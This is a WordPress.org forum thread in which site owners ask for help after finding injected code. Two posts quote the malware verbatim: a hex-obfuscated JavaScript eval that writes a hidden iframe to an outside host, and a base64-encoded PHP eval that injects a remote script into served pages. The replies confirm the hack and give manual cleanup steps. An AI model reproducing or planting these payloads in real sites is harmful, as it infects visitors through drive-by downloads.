WordPress.org

Ready to get started?Download WordPress

Forums

Site hacked? (8 posts)

  1. Fab_DM
    Member
    Posted 3 years ago #

    Hi,
    today i went to the home page of my site and found this error:

    Parse error: syntax error, unexpected '<' in /home/mhd-01/www.health-bodytips.com/htdocs/wp-config.php on line 93.

    I couldn't reach any of the pages of my site. I checked the config.php file and i found this part on line 93:

    <script type='text/javascript'>
    var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f6b726f6b6f64696c6f763535352e75732f622e7068703f74703d33363436363461363235376162663662222077696474683d223122206865696768743d223122206672616d65626f726465723d2230223e3c2f696672616d653e2729";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);
    </script>

    I deleted it and now my site is back online but i'm really worried that i might be hacked. And this just before i had to do my 1st backup so i can't even restore a previuos version :(

    Was i hacked or just too worried?
    Do i have to check other files to make sure i don't have any virus etc?
    Is thjere any way to scan the site with an antivirus?

    Thank you in advance!

    Fab

  2. esmi
    Theme Diva & Forum Moderator
    Posted 3 years ago #

  3. Fab_DM
    Member
    Posted 3 years ago #

    Does your reply mean that i've been hacked then? :(

  4. esmi
    Theme Diva & Forum Moderator
    Posted 3 years ago #

    Yes - I think you have.

  5. Fab_DM
    Member
    Posted 3 years ago #

    :(
    Very bad...
    Problem is that i'm not an expert and i don't know how to clean the site. Checking the guides you gave me i don't understand how to do it :(

  6. derker
    Member
    Posted 3 years ago #

    My site was definitely hacked... but I'm not sure why or what it is doing? So far I have found a block of code inserted into the wp-index file and the dashboard.php files...

    What the hack does visibly is bascially yank out the css on the dashboard so the admin side looks like an unstyled html doc... when I opened up the files I found this code inserted at the top:

    <?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmIChzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwiTVNJRSA2Iil8fHN0cmlzdHIoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdLCJNU0lFIDciKXx8c3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sIk1TSUUgOCIpfHxzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwiTVNJRSA5IikpeyAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5dFpYRmhjMmh2Y0hCbGNtTnZiUzVqYjIwdmEyOHVjR2h3SWo0OEwzTmpjbWx3ZEQ0PSIpOyAgICAgIH0gICAgICByZXR1cm4gIiI7ICAgICB9ICAgIH0gICAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlJykpeyAgICAgZnVuY3Rpb24gZ3pkZWNvZGUoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0Qyl7ICAgICAgJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RD1Ab3JkKEBzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywzLDEpKTsgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PTEwOyAgICAgICRSQTNENTJFNTJBNDg5MzZDREUwRjUzNTZCQjA4NjUyRjI9MDsgICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjQpeyAgICAgICAkUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCPUB1bnBhY2soJ3YnLHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLDEwLDIpKTsgICAgICAgJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj0kUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCWzFdOyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0yKyRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI7ICAgICAgfSAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmOCl7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjE2KXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT1Ac3RycG9zKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsY2hyKDApLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKzE7ICAgICAgfSAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmMil7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkrPTI7ICAgICAgfSAgICAgICRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM9QGd6aW5mbGF0ZShAc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkpOyAgICAgIGlmKCRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM9PT1GQUxTRSl7ICAgICAgICRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM9JFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QzsgICAgICB9ICAgICAgcmV0dXJuICRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM7ICAgICB9ICAgIH0gICAgZnVuY3Rpb24gbXJvYmgoJFJFODJFRTlCMTIxRjcwOTg5NUVGNTRFQkE3RkE2Qjc4Qil7ICAgICBIZWFkZXIoJ0NvbnRlbnQtRW5jb2Rpbmc6IG5vbmUnKTsgICAgICRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREU9Z3pkZWNvZGUoJFJFODJFRTlCMTIxRjcwOTg5NUVGNTRFQkE3RkE2Qjc4Qik7ICAgICAgIGlmKHByZWdfbWF0Y2goJy9cPFwvYm9keS9zaScsJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERSkpeyAgICAgIHJldHVybiBwcmVnX3JlcGxhY2UoJy8oXDxcL2JvZHlbXlw+XSpcPikvc2knLGdtbCgpLiJcbiIuJyQxJywkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFKTsgICAgIH1lbHNleyAgICAgIHJldHVybiAkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFLmdtbCgpOyAgICAgfSAgICB9ICAgIG9iX3N0YXJ0KCdtcm9iaCcpOyAgIH0gIH0="));?>

    Any ideas on how to get rid of this or clean my site would be greatly appreciated...

    thx,
    Derek

  7. esmi
    Theme Diva & Forum Moderator
    Posted 3 years ago #

  8. antifmradio
    Member
    Posted 2 years ago #

    yes you were hacked
    my joomla site was hacked with teh same code
    i know how it gets there ( through your FTP connection )
    but your question Fab_DM
    was how to correct this

    incase it happens next time yuo need to open your FTP tool
    chcek the DATE CHANGED on all files
    pull down all the files that were effected on the same date.
    If you have dreamweaver at this point
    it would help you out ALOT!!

    Also via your FTP tool, look for any IMAGES that were effected same day
    Dont download these images
    just delete them from the server and upload new ones

    Yes it even infects images.

    OK now with dreamweaver, use the FIND / EDIT ALL function.

    What you need to do is open one of the php files in dreamweaver
    and look at the code
    HIGHTLIGHT the code then click EDIT > FIND and REPLACE

    In the top box you should PASTE the code you highlighted
    that code would ONLY be the script that was inserted into your page

    in the BOTTOM BOX
    leave it blank

    now before you hit EDIT you need to tell dreamweaver to file ALL THE FILES INSIDE THE FOLDER on your computer
    where you downloaded all the files to.

    It will search all pages in that folder
    remove the script info
    then you can SAVE ALL PAGES

    Now you have to do it again for that extra bit of script it added at the BOTTOM of your same php pages
    do the steps again with new pasted code

    SAVE ALL PAGES

    reupload and you are done

    now the final step is
    CHANGE ALL PASSWORDS EVERYWHERE including access to your FTP

    if you want to know what this code does just reply
    ill let ya know

Topic Closed

This topic has been closed to new replies.

About this Topic